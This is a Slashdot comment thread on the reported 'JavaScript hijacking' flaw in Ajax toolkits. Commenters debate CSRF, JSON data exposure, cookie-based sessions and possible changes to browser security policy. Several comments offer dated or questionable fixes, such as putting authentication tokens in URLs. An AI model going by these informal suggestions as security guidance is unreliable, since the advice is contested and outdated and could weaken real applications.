Web 2.0 Under Siege 170
Robert writes "Security researchers have found what they say is an entirely new kind of web-based
attack, and it only targets the Ajax applications so beloved of the 'Web 2.0' movement.
Fortify Software, which said it discovered the new class of vulnerability and has named it
'JavaScript hijacking', said that almost all the major Ajax toolkits have been found vulnerable. 'JavaScript
Hijacking allows an unauthorized attacker to read sensitive data from a vulnerable
application using a technique similar to the one commonly used to create mashups'"
XSS (Score:2, Interesting)
XSRF (Score:2, Interesting)
http://en.wikipedia.org/wiki/Cross-site_request_f
Re:XSS (Score:1, Interesting)
XSS/JS Injection is more about injecting alien javascript onto site A
OK so far.
Darn, I thought it was to make site A execute code/retrieve infos from the user's system, not from another site
Would you care to develop a little bit?
Where's the problem? (Score:5, Interesting)
So essentially it means that the attacker can use the authentication cookie of the user to authenticate them again, and then run javascript with that authentication. But why are AJAX apps storing authentication in cookies? If you need to store authentication (User session id's etc), store them in a variable within the javascript. That'll stay there until a page refresh clears variable status, and how many page refreshes occur with AJAX?
AJAX apps do not need to (and should not!) store user authentication in cookies. Cookies are useful for keeping a continual session open between pages. AJAX needs no continual session. If they don't use cookies, then other sites cannot use that authentication.
Where's the problem? (What am i missing?)
PimTerry
Shirky's Law: (Score:5, Interesting)
The obvious implication of Shirky's Law is that Web 2.0 services are an attractive nuisance and give spammers and other griefers an incentive to game the system. Any new web service has to account for this and build in extremely high levels of security. Obviously nobody is doing this.
We've already seen this before (Score:5, Interesting)
It actually could be pretty nasty. I think the only solution is for you to pass authenticated tokens through the url or input parameters (not through cookies).
It might be a good time to use the firefox NoScript plugin if you're not using it already. Only allow javascript on sites you trust.
i told that EVERY time AJAX - 2.0 hype was posted (Score:4, Interesting)
Re:Okay, I'll be the first to ask. (Score:3, Interesting)
Re:sigh (Score:4, Interesting)
That'll be because it is. It's basically an observation that CSRF on a site which returns data in JSON format allows the attacker to read the content of the result. Well, duh. Of course that happens. It's one of the reasons I've always opposed JSON as a useful format.
The other reason is equally bad, but only applies to "mash up" type situations: the coder of the client has to trust the server with access to all data in the client. This makes it useless in many situations.
The best solution would be to scrap the current security system, make subrequest cookies (including XMLHttpRequests) dependent on both the domain the request goes to *and* the domain of the page that caused the request, and allow XMLHttpRequest to access servers other than the page source. This would both fix CSRF and eliminate the need for JSON. What more do you want?
Re:XML is so last week. What's really wrong. (Score:4, Interesting)
You don't say. My first thought on hearing about the entire idea was "why would you want to let a foreign server run its code on your page?"
The real problem is JavaScript's excessive dynamism. Because you can redefine objects in one script and have that affect another script from a different source, the language is fundamentally vulnerable.
Err... if I don't let foreign code execute (e.g. by doing 'var e = document.createElement("script"); e.src = "http://www.someotherserver.com/potential-securit
The last attempt to fix this problem involved adding restrictions to XMLHttpRequest, but that only plugged some of the holes.
The fix seems obvious to me:
* cookies in subrequests must be tied to the domain of the page that initiated the request as well as the domain the request goes to; this reduces the possibility of CSRF. So if www.a.com has a web page that requests data from www.b.com, it will only send a cookie if www.b.com set one in response to a previous request from www.a.com. This applies to SCRIPT tags, to IFRAME tags, to IMG tags, to LINK tags, etc.
* XMLHttpRequest must not be tied to the same-domain policy. Attempts to access a different domain should result in a request for confirmation from the user for the first time any particular requester/receiver domain pair is used. This means mashups (and other applications that need cross-domain access) can be written that do not need to use JSON. JSON parsing through script insertion or eval() is insecure, and should be deprecated.
As a minimum, it's probably desirable to insist in the browser that, on secure pages, all Javascript and data must come from the main page of the domain. No "mashups" with secure pages.
Scripts, yes. I don't see the need to ensure that data originates in the same domain.